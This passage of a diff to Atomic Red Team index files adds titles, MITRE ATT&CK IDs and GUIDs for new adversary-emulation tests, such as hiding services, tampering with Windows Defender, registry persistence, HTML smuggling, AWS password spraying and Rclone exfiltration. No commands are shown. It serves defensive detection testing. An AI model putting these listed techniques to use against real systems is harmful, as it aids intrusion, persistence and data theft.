 defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
 defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
+defense-evasion,T1564,Hide Artifacts,4,Create and Hide a Service with sc.exe,333c7de0-6fbe-42aa-ac2b-c7e40b18246a,command_prompt
 defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
 defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
 defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell
@@ -246,6 +247,7 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,33,LockBit Bl
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,34,LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell,d8c57eaa-497a-4a08-961e-bd5efd7c9374,powershell
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,35,Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell,5e27f36d-5132-4537-b43b-413b0d5eec9a,powershell
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,36,Disable Windows Defender with PwSh Disable-WindowsOptionalFeature,f542ffd3-37b4-4528-837f-682874faa012,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,37,WMIC Tamper with Windows Defender Evade Scanning Folder,59d386fc-3a4b-41b8-850d-9e3eee24dfe4,command_prompt
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
@@ -287,6 +289,7 @@ defense-evasion,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd
 defense-evasion,T1127.001,Trusted Developer Utilities Proxy Execution: MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
 defense-evasion,T1127.001,Trusted Developer Utilities Proxy Execution: MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
 defense-evasion,T1564.003,Hide Artifacts: Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
+defense-evasion,T1027.006,HTML Smuggling,1,HTML Smuggling Remote Payload,30cbeda4-08d9-42f1-8685-197fad677734,powershell
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
@@ -383,6 +386,8 @@ privilege-escalation,T1134.002,Create Process with Token,2,WinPwn - Get SYSTEM s
 privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
 privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
 privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
+privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,4,Winlogon HKLM Shell Key Persistence - PowerShell,95a3c42f-8c88-4952-ad60-13b81d929a9d,powershell
+privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,5,Winlogon HKLM Userinit Key Persistence - PowerShell,f9b8daff-8fa7-4e6a-a1a7-7c14675a545b,powershell
 privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
 privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
 privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
@@ -418,8 +423,11 @@ privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run K
 privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,13,HKLM - Policy Settings Explorer Run Key,b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f,powershell
 privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,14,HKLM - Append Command to Winlogon Userinit KEY Value,f7fab6cc-8ece-4ca7-a0f1-30a22fccd374,powershell
 privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,15,HKLM - Modify default System Shell - Winlogon Shell KEY Value ,1d958c61-09c6-4d9e-b26b-4130314e520e,powershell
+privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,16,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
+privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,17,HKCU - Persistence using CommandProcessor AutoRun key (With Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
 privilege-escalation,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 privilege-escalation,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
+privilege-escalation,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
 privilege-escalation,T1134.005,Access Token Manipulation: SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
 privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
 privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
@@ -561,6 +569,8 @@ persistence,T1136.001,Create Account: Local Account,6,Create a new Windows admin
 persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
 persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
 persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
+persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,4,Winlogon HKLM Shell Key Persistence - PowerShell,95a3c42f-8c88-4952-ad60-13b81d929a9d,powershell
+persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,5,Winlogon HKLM Userinit Key Persistence - PowerShell,f9b8daff-8fa7-4e6a-a1a7-7c14675a545b,powershell
 persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
 persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
 persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
@@ -589,9 +599,12 @@ persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Sta
 persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,13,HKLM - Policy Settings Explorer Run Key,b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f,powershell
 persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,14,HKLM - Append Command to Winlogon Userinit KEY Value,f7fab6cc-8ece-4ca7-a0f1-30a22fccd374,powershell
 persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,15,HKLM - Modify default System Shell - Winlogon Shell KEY Value ,1d958c61-09c6-4d9e-b26b-4130314e520e,powershell
+persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,16,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
+persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,17,HKCU - Persistence using CommandProcessor AutoRun key (With Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
 persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
 persistence,T1098,Account Manipulation,9,Password Change on Directory Service Restore Mode (DSRM) Account,d5b886d9-d1c7-4b6e-a7b0-460041bf2823,command_prompt
+persistence,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
 persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
 persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
 persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
@@ -857,6 +870,7 @@ discovery,T1016,System Network Configuration Discovery,4,System Network Configur
 discovery,T1016,System Network Configuration Discovery,5,List Open Egress Ports,4b467538-f102-491d-ace7-ed487b853bf5,powershell
 discovery,T1016,System Network Configuration Discovery,6,Adfind - Enumerate Active Directory Subnet Objects,9bb45dd7-c466-4f93-83a1-be30e56033ee,command_prompt
 discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5818-4868-b8a7-8fd07c455c1b,command_prompt
+discovery,T1016,System Network Configuration Discovery,9,DNS Server Discovery Using nslookup,34557863-344a-468f-808b-a1bfb89b4fa9,command_prompt
 discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
 discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
 discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
@@ -1012,3 +1026,4 @@ exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,6,MAZE FTP Upload,57799bc2-ad1e-4130-a793-fb0c385130ba,powershell
+exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,7,Exfiltration Over Alternative Protocol - FTP - Rclone,b854eb97-bf9b-45ab-a1b5-b94e4880c56b,powershell

atomics/Indexes/Indexes-Markdown/iaas-index.md

@@ -32,7 +32,8 @@
 - T1606.002 Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1040 Network Sniffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1110.003 Brute Force: Password Spraying](../../T1110.003/T1110.003.md)
+  - Atomic Test #9: AWS - Password Spray an AWS using GoAWSConsoleSpray [iaas:aws]
 - T1552.001 Unsecured Credentials: Credentials In Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/index.md

@@ -94,6 +94,7 @@
   - Atomic Test #1: Extract binary files via VBA [windows]
   - Atomic Test #2: Create a Hidden User Called "$" [windows]
   - Atomic Test #3: Create an "Administrator " user (with a space on the end) [windows]
+  - Atomic Test #4: Create and Hide a Service with sc.exe [windows]
 - [T1484.002 Domain Trust Modification](../../T1484.002/T1484.002.md)
   - Atomic Test #1: Add Federation to Azure AD [azure-ad]
 - T1527 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -464,6 +465,7 @@
   - Atomic Test #34: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell [windows]
   - Atomic Test #35: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell [windows]
   - Atomic Test #36: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature [windows]
+  - Atomic Test #37: WMIC Tamper with Windows Defender Evade Scanning Folder [windows]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -561,7 +563,8 @@
 - T1601.001 Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1146 Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1027.006 HTML Smuggling](../../T1027.006/T1027.006.md)
+  - Atomic Test #1: HTML Smuggling Remote Payload [windows]
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
@@ -793,6 +796,8 @@
   - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
   - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
   - Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
+  - Atomic Test #4: Winlogon HKLM Shell Key Persistence - PowerShell [windows]
+  - Atomic Test #5: Winlogon HKLM Userinit Key Persistence - PowerShell [windows]
 - [T1546.012 Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md)
   - Atomic Test #1: IFEO Add Debugger [windows]
   - Atomic Test #2: IFEO Global Flags [windows]
@@ -853,6 +858,8 @@
   - Atomic Test #13: HKLM - Policy Settings Explorer Run Key [windows]
   - Atomic Test #14: HKLM - Append Command to Winlogon Userinit KEY Value [windows]
   - Atomic Test #15: HKLM - Modify default System Shell - Winlogon Shell KEY Value  [windows]
+  - Atomic Test #16: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
+  - Atomic Test #17: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
 - [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
   - Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
 - T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -867,7 +874,8 @@
   - Atomic Test #1: Process Hollowing using PowerShell [windows]
   - Atomic Test #2: RunPE via VBA [windows]
 - T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1546 Event Triggered Execution](../../T1546/T1546.md)
+  - Atomic Test #1: Persistence with Custom AutodialDLL [windows]
 - [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
   - Atomic Test #1: Add command to .bash_profile [macos, linux]
   - Atomic Test #2: Add command to .bashrc [macos, linux]
@@ -1230,6 +1238,8 @@
   - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
   - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
   - Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
+  - Atomic Test #4: Winlogon HKLM Shell Key Persistence - PowerShell [windows]
+  - Atomic Test #5: Winlogon HKLM Userinit Key Persistence - PowerShell [windows]
 - T1019 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1042 Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1164 Re-opened Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1298,6 +1308,8 @@
   - Atomic Test #13: HKLM - Policy Settings Explorer Run Key [windows]
   - Atomic Test #14: HKLM - Append Command to Winlogon Userinit KEY Value [windows]
   - Atomic Test #15: HKLM - Modify default System Shell - Winlogon Shell KEY Value  [windows]
+  - Atomic Test #16: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
+  - Atomic Test #17: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
 - [T1136.003 Create Account: Cloud Account](../../T1136.003/T1136.003.md)
   - Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
 - [T1098 Account Manipulation](../../T1098/T1098.md)
@@ -1324,7 +1336,8 @@
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1505.004 IIS Components [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1546 Event Triggered Execution](../../T1546/T1546.md)
+  - Atomic Test #1: Persistence with Custom AutodialDLL [windows]
 - [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
   - Atomic Test #1: Add command to .bash_profile [macos, linux]
   - Atomic Test #2: Add command to .bashrc [macos, linux]
@@ -1696,6 +1709,7 @@
   - Atomic Test #6: Password Spray Invoke-DomainPasswordSpray Light [windows]
   - Atomic Test #7: Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365) [azure-ad]
   - Atomic Test #8: Password Spray using Kerbrute Tool [windows]
+  - Atomic Test #9: AWS - Password Spray an AWS using GoAWSConsoleSpray [iaas:aws]
 - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1003.005 OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md)
   - Atomic Test #1: Cached Credential Dump via Cmdkey [windows]
@@ -1920,6 +1934,7 @@
   - Atomic Test #6: Adfind - Enumerate Active Directory Subnet Objects [windows]
   - Atomic Test #7: Qakbot Recon [windows]
   - Atomic Test #8: List macOS Firewall Rules [macos]
+  - Atomic Test #9: DNS Server Discovery Using nslookup [windows]
 - T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1482 Domain Trust Discovery](../../T1482/T1482.md)
   - Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
@@ -2369,4 +2384,5 @@
   - Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows]
   - Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
   - Atomic Test #6: MAZE FTP Upload [windows]
+  - Atomic Test #7: Exfiltration Over Alternative Protocol - FTP - Rclone [windows]
 

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -65,6 +65,7 @@
   - Atomic Test #1: Extract binary files via VBA [windows]
   - Atomic Test #2: Create a Hidden User Called "$" [windows]
   - Atomic Test #3: Create an "Administrator " user (with a space on the end) [windows]
+  - Atomic Test #4: Create and Hide a Service with sc.exe [windows]
 - T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1562.009 Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
@@ -355,6 +356,7 @@
   - Atomic Test #34: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell [windows]
   - Atomic Test #35: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell [windows]
   - Atomic Test #36: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature [windows]
+  - Atomic Test #37: WMIC Tamper with Windows Defender Evade Scanning Folder [windows]
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -423,7 +425,8 @@
 - T1500 Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1223 Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1027.006 HTML Smuggling](../../T1027.006/T1027.006.md)
+  - Atomic Test #1: HTML Smuggling Remote Payload [windows]
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
@@ -592,6 +595,8 @@
   - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
   - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
   - Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
+  - Atomic Test #4: Winlogon HKLM Shell Key Persistence - PowerShell [windows]
+  - Atomic Test #5: Winlogon HKLM Userinit Key Persistence - PowerShell [windows]
 - [T1546.012 Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md)
   - Atomic Test #1: IFEO Add Debugger [windows]
   - Atomic Test #2: IFEO Global Flags [windows]
@@ -645,6 +650,8 @@
   - Atomic Test #13: HKLM - Policy Settings Explorer Run Key [windows]
   - Atomic Test #14: HKLM - Append Command to Winlogon Userinit KEY Value [windows]
   - Atomic Test #15: HKLM - Modify default System Shell - Winlogon Shell KEY Value  [windows]
+  - Atomic Test #16: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
+  - Atomic Test #17: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
 - T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -652,7 +659,8 @@
   - Atomic Test #1: Process Hollowing using PowerShell [windows]
   - Atomic Test #2: RunPE via VBA [windows]
 - T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1546 Event Triggered Execution](../../T1546/T1546.md)
+  - Atomic Test #1: Persistence with Custom AutodialDLL [windows]
 - [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md)
   - Atomic Test #1: Injection SID-History with mimikatz [windows]
 - [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
@@ -908,6 +916,8 @@
   - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
   - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
   - Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
+  - Atomic Test #4: Winlogon HKLM Shell Key Persistence - PowerShell [windows]
+  - Atomic Test #5: Winlogon HKLM Userinit Key Persistence - PowerShell [windows]
 - T1019 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1042 Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -963,6 +973,8 @@
   - Atomic Test #13: HKLM - Policy Settings Explorer Run Key [windows]
   - Atomic Test #14: HKLM - Append Command to Winlogon Userinit KEY Value [windows]
   - Atomic Test #15: HKLM - Modify default System Shell - Winlogon Shell KEY Value  [windows]
+  - Atomic Test #16: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
+  - Atomic Test #17: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
 - [T1098 Account Manipulation](../../T1098/T1098.md)
   - Atomic Test #1: Admin Account Manipulate [windows]
   - Atomic Test #2: Domain Account and Group Manipulate [windows]
@@ -972,7 +984,8 @@
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1505.004 IIS Components [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1546 Event Triggered Execution](../../T1546/T1546.md)
+  - Atomic Test #1: Persistence with Custom AutodialDLL [windows]
 - [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
   - Atomic Test #1: Authentication Package [windows]
 - T1128 Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1408,6 +1421,7 @@
   - Atomic Test #5: List Open Egress Ports [windows]
   - Atomic Test #6: Adfind - Enumerate Active Directory Subnet Objects [windows]
   - Atomic Test #7: Qakbot Recon [windows]
+  - Atomic Test #9: DNS Server Discovery Using nslookup [windows]
 - T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1482 Domain Trust Discovery](../../T1482/T1482.md)
   - Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
@@ -1706,4 +1720,5 @@
   - Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows]
   - Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
   - Atomic Test #6: MAZE FTP Upload [windows]
